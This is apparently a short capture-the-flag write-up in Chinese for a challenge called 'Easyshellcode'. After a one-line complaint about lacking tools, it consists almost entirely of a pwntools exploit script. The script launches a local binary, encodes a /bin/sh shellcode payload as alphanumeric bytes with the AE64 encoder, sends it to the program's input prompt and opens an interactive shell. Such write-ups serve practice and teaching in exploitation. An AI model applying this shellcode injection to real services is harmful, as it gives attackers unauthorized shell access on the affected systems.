Easyshellcode:
不说了,都是没有工具的血泪史,直接上exp:
from pwn import * from numbers import * from ae64 import AE64 context.log_level = 'debug' p = process('./pwn') p.recvuntil('say? ') obj = AE64() sc = obj.encode(asm(shellcraft.sh())) p.sendline(sc) p.interactive()